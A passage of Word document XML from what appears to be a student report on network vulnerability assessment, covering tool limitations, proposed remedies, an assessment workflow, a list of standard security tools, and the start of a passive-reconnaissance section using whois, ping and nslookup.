    <w:p w14:paraId="5F368FC7" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Limited Coverage of Exploitation Techniques: Some vulnerability assessment tools focus on identifying vulnerabilities but may not fully simulate the exploitation techniques used by real attackers. This limitation may result in a failure to identify vulnerabilities that can be exploited in a specific manner, leading to a false sense of security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B369B63" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67665C00" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42097936" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298A679B" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A30E1D" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFCA736" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F3F37E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.2 Proposed Solutions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D0EA0A" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To address the existing problems associated with network vulnerability assessment methods, organizations can consider implementing the following proposed solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF3D21" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC8D701" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Validation and Verification: Organizations should perform thorough validation and verification of vulnerability assessment results to minimize false positives and false negatives. This can involve manual verification of identified vulnerabilities, leveraging additional tools or techniques for validation, and incorporating feedback from security experts or red teaming exercises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ED2E29" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2010AAD8" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comprehensive Coverage: It is crucial to ensure that vulnerability assessment methods cover a wide range of attack vectors, including both known vulnerabilities and emerging threats. Organizations should regularly update and expand their vulnerability databases, leverage threat intelligence sources, and consider conducting penetration testing to identify vulnerabilities that may be missed by automated scanning tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76F30A" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0056A6EB" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Contextual Understanding: Enhancing the contextual understanding of vulnerabilities is vital. This can be achieved by tailoring vulnerability assessment tools and methodologies to the specific network environment, taking into account unique configurations, custom applications, and business processes. Organizations should provide necessary context and information to assessment tools to generate more accurate and relevant results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E4882" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3140737A" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Risk-Based Prioritization: Implementing a risk-based prioritization approach helps organizations accurately assess the impact and likelihood of exploitation for identified vulnerabilities. This involves considering factors such as business criticality, potential consequences, exploitability, and existing mitigating controls. Organizations should develop a well-defined risk assessment framework to prioritize remediation efforts effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109AE5C6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216D8970" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Advanced Exploitation Techniques: Organizations can leverage more advanced penetration testing methodologies to simulate real-world attack scenarios and identify vulnerabilities that might be missed by traditional vulnerability assessment tools. This includes employing ethical hackers or engaging third-party experts to conduct thorough penetration tests using sophisticated techniques and customized exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2777D06D" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial MT"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A83ADAE" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial MT"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AACA65" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial MT"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D25762" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial MT"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CCFDBC0" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6497F0A8" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA3A6EC" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047AB7D" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>THEORATICAL ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AA8B5" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A7720D7" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1 Block Diagram of Network Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37339FF6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Assessment of large networks in particular can become a very cyclic process if you are testing the networks of an organization in a blind sense and are given minimal information. As you test the network, information leak bugs can be abused to find different types of useful information (including trusted domain names, IP address blocks, and user account details) that is then fed back into other processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528C81A0" w14:textId="738B30C6" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27943435" wp14:editId="471B0B3E">
            <wp:extent cx="4864100" cy="4273550"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="12700"/>
            <wp:docPr id="111352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4100" cy="4273550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7355A81F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381F94AA" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This flowchart includes network enumeration, then bulk network scanning, and finally specific service assessment. It may be the case that by assessing a rogue nonauthoritative DNS service, an analyst may identify previously unknown IP address blocks, which can then be fed back into the network enumeration process to identify further network components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EE56EF" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBE7550" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA781CC" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C8B8E7" w14:textId="77777777" w:rsidR="00336E0D" w:rsidRDefault="00336E0D" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E970AB6" w14:textId="3B2B3CD0" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2 Hardware/Software tools used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7382B07F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hardware: Personal Computers, Target website servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B9E3CE" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Software: Nessus, Kali Linux, Nmap, OWASP ZAP, Metasploitable2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C205F8" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656BD023" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EXPERIMENTAL INVESTIGATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741CAEC5" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B69B687" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Passive Reconassaince</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C0F5D" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> whois</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25365713" w14:textId="6E5903AF" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7290BDE5" wp14:editId="76211614">
            <wp:extent cx="4972050" cy="3244850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1578979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2050" cy="3244850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B74A25" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="02A449E8" w14:textId="05F5E842" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D1FAC5" wp14:editId="260AC35F">
            <wp:extent cx="4552950" cy="2914650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1141598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1973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2950" cy="2914650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B4024D" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="5BC92694" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="00F264F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED9EE2E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="00F264F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19934290" w14:textId="1A94FFA9" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="00F264F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="538E25B7" wp14:editId="29115FCD">
            <wp:extent cx="3378200" cy="996950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="156090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8200" cy="996950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D5EB6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD74223" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C110046" w14:textId="37B2D37C" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F49C8A2" wp14:editId="684EF250">
            <wp:extent cx="3549650" cy="558800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16976038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9650" cy="558800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="234442D1" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC4070C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
